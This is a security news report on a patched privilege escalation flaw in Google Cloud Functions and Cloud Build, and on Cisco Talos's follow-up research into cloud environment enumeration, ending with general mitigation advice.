- Best Roborock vacuums 2025: After testing multiple models, these are the top ones
- OpenAI goes all in on hardware, will buy Jony Ive's AI startup
- AWS clamping down on cloud capacity swapping; here’s what IT buyers need to know
- This Eufy robot vacuum's dustbin doubles as a cordless vac and it's $200 off
- Get a free pair of Meta Ray-Bans when you sign up for Verizon 5G home internet
Flaw in Google Cloud Functions Sparks Broader Security Concerns
A potential privilege escalation flaw affecting Google Cloud Platform (GCP) Cloud Functions and its Cloud Build service has been identified and investigated by security researchers.
The issue, initially discovered by Tenable Research, allowed attackers to exploit the deployment process of GCP Cloud Functions to gain elevated permissions.
Google has since issued a patch to mitigate the excessive privileges previously granted to default Cloud Build service accounts.
Attack Technique Repurposed Across Cloud Environments
Cisco Talos recently expanded upon Tenable’s findings by replicating the attack technique and testing its impact across multiple cloud platforms.
Researchers set up a Debian server in GCP with Node Package Manager (NPM) and Ngrok, using a malicious package.json file to extract tokens and simulate an attack. They confirmed that Google’s patch has neutralized the original privilege escalation vector.
However, Talos demonstrated that the same approach could be adapted to perform environment enumeration – a reconnaissance tactic useful for mapping systems – even without privileged access.
By deploying the altered package.json in AWS Lambda and Azure Functions, Talos verified the tactic’s broader applicability across cloud services.
Enumeration Techniques Observed
The research highlighted several enumeration methods attackers could use to gather valuable system and network information:
- ICMP discovery for network mapping
- Detection of .dockerenv files to confirm containerized environments
- CPU scheduling checks to identify init systems
- Container ID and mount point analysis for potential escape techniques
- Operating system and kernel detail extraction
- User and permission scans to aid privilege escalation
- Network traffic analysis for vulnerability assessment
These techniques can be deployed without privileged credentials, making them viable in various scenarios where service accounts are correctly limited.
Google Responds and Mitigation Measures Advised
Following Tenable’s report, Google modified Cloud Build’s behavior and added new policies for more granular service account control. Talos verified that exfiltration of service account tokens using this method is no longer feasible in GCP.
To defend against similar threats, organizations are advised to:
- Enforce the principle of least privilege for all service accounts
- Regularly audit and monitor permissions
- Alert on unexpected Cloud Function modifications
- Inspect outgoing traffic for signs of exfiltration
- Validate the integrity of external NPM packages
Though Google has addressed the original flaw, the research underscores the persistent risk posed by overly permissive configurations and the importance of continuous security monitoring across cloud environments.
Image credit: Algi Febri Sugita / Shutterstock.com
